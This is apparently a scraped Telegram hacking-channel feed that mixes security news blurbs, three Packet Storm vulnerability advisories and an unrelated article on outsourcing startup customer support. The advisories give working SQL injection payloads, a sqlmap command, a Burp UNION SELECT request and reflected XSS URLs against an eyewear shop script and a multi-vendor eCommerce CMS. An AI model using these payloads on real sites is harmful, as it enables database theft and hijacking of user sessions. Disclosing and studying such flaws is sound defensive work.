Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
A Comprehensive Guide to Identifying, Mitigating and Protecting Your Website from Cross-Site Request ForgeryContinue reading on InfoSec Write-ups » (https://infosecwriteups.com/understanding-and-preventing-csrf-attackabout-csrf-a107a5b5ddb5?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Radiant Logic Signs Definitive Agreement to Acquire Brainwave GRC

Move will strengthen position as a leader in the identity governance and analytics market.
Dark Reading: Attacks/Breaches
Inside Killnet: Pro-Russia Hacktivist Group's Support and Influence Grows

Killnet is building its profile, inspiring jewelry sales and rap anthems. But the impact of its DDoS attacks, like the ones that targeted 14 major US hospitals this week, remain largely questionable.
Dark Reading: Attacks/Breaches
Beating the Odds: 3 Challenges Women Face in the Cybersecurity Industry

Companies need to be aware of the work culture they foster. Diversity and inclusion aren't just buzzwords. Increasing female visibility and improving female mentoring to help women enter and advance within the cybersecurity industry are key steps forward.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Eyewear Shop 1.0 SQL Injection

https://3.bp.blogspot.com/-S3Qyj_CQLZk/WWlvO05KSCI/AAAAAAAAIM0/1UOPsv562Y4pHjCru7b9m-kScCR1bHauwCLcBGAs/s1600/h27.png
Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

SHA-256 | 7f480978af7f6cb6c10b388d9b0672e6417dbf34177646251736adbbcb0f145e

Download
# Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)
# Date: 2023-01-02
# Exploit Author: Muhammad Navaid Zafar Ansari
# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip
# Version: 1.0
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)
# CVE: Not Assigned Yet
# References: -

------------------------------------------------------------------------------------

1. Description:
----------------------

Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
2. Proof of Concept:
----------------------

Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.
Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql

SQLMap Response:

[*] starting @ 04:49:58 /2023-02-01/

[04:49:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK
---
[04:50:00] [INFO] testing MySQL
[04:50:00] [INFO] confirming MySQL
[04:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.55, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
3. Example payload:
----------------------

(boolean-based)

' AND 1=1 AND 'test'='test
4. Burpsuite request:
----------------------

GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip
Connection: close

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png eCommerce Marketplace Platform CMS version 1.7 suffers from a cross site scripting vulnerability.

SHA-256 | dbb8c908b79f269effe2464df2de203b03719231d344c768a2cbef1efc7a7b05Download ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : mybizcms.com │
│ Vendor : MyBizCMS │
│ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │
│ Vuln Type: Reflected XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /search

GET parameter 'pg' is vulnerable to XSS

/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsg
Path: /categories/phones

GET parameter 'max_price' is vulnerable to XSS

/categories/phones?min_price=2485&max_price=fulkc">hpbwm
Path: /categories/phones

GET parameter 'min_price' is vulnerable to XSS

/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag
[-] Done
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
eCommerce Marketplace Platform CMS 1.7 SQL Injection

https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png eCommerce Marketplace Platform CMS version 1.7 suffers from a remote SQL injection vulnerability.

SHA-256 | 69e687c4a0d9df1eff0262dabcd54301b07d5a417b4f40ef540a439dfe252659Download ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : mybizcms.com │
│ Vendor : MyBizCMS │
│ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /categories/phones

/categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI]
GET parameter 'min_price' is vulnerable to SQLI

GET parameter 'max_price' is vulnerable to SQLI

GET parameter 'a4tech-brand[]' is vulnerable to SQLI

GET parameter 'battery[]' is vulnerable to SQLI

GET parameter 'display[]' is vulnerable to SQLI

GET parameter 'performance[]' is vulnerable to SQLI

GET parameter 'attribute3[]' is vulnerable to SQLI
[-] Done
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Should South East Asian Tech Startups Consider Outsourcing Support?

Southeast Asian tech startups are attracting attention for all the right reasons. Global markets cannot get enough of the innovative technological solutions coming from the region. However, no matter how outstanding the solution, some products never achieve international acclaim because businesses need to scale their efforts more quickly.

In answer to this issue, Support-as-a-Service companies like supportyourapp.com have been developing flexible team structures and, in some cases, chatbot services to help startups scale up more effectively.

Are these solutions the best option for your business? Read on to learn more about the pros and cons when you outsource customer support. The Advantages of Outsourcing Customer SupportThere are several advantages to outsourcing customer support. These include:

* Cost-effectiveness: Outsourcing customer support is more cost-effective than hiring and training a team in-house, especially for startups with limited resources.
* Scalability: Outsourcing allows startups to scale their operations quickly and efficiently as their customer base grows.
* Access to expertise: Outsourced customer support providers employ teams of experienced professionals who can handle a wide range of customer inquiries and issues.
* Flexibility: Outsourcing gives startups more flexible support hours and multilingual language support.
* Better focus: Outsourcing support allows startups to focus on their core business and product development rather than diverting much-needed resources. The Disadvantages of Outsourcing Customer SupportOutsourcing is a practical option, but it won’t suit every firm. The disadvantages include the following:

* Quality control is out of your hands: It can be challenging to ensure that the quality of customer support provided by outsourced providers meets the standards of the startup.
* Communication issues: Communication with large support providers can be difficult, leading to misunderstandings and delays in resolving customer issues.
* Loss of control: You will have input rather than complete control over certain aspects of the customer support process.
* Cultural and language barriers: Outsourcing customer support to providers in other countries can lead to cultural and language barriers that can negatively impact the customer experience.
* Dependence on the provider: Startups may become overly dependent on the outsourced customer support provider, which can be a misstep if the provider fails to deliver the expected service. How to Maximize the Benefits and Avoid the Potential PitfallsSuccess here depends on how willing you are to perform due diligence. There are several outstanding outsourcing companies, but it may take some research to find the best fit for you.

The more time you put in upfront, the better your results will be. Finding the right partner in this is much like finding a business partner. First, you must feel each other out and ensure you are a good fit.

Here are some tips to get you started. What services do you need, and what are your expectations? Clearly define the services you need and your expectations to narrow the field. Can the potential firms offer everything you need? How will they meet your expectations? Can you monitor calls? What feedback will they provide?

Performing this exercise early on also allows you to assess how realistic those expectations are. What experience does the firm have, and what is its history?Does the company currently represent, or has it ever represented, firms like yours? Is it a new company, or does it have an established track record? Look for recent start dates, frequent name changes, or regular rebranding. These may all be red flags. How attentive is the sales team?By this, we mean, how much interest ha[...]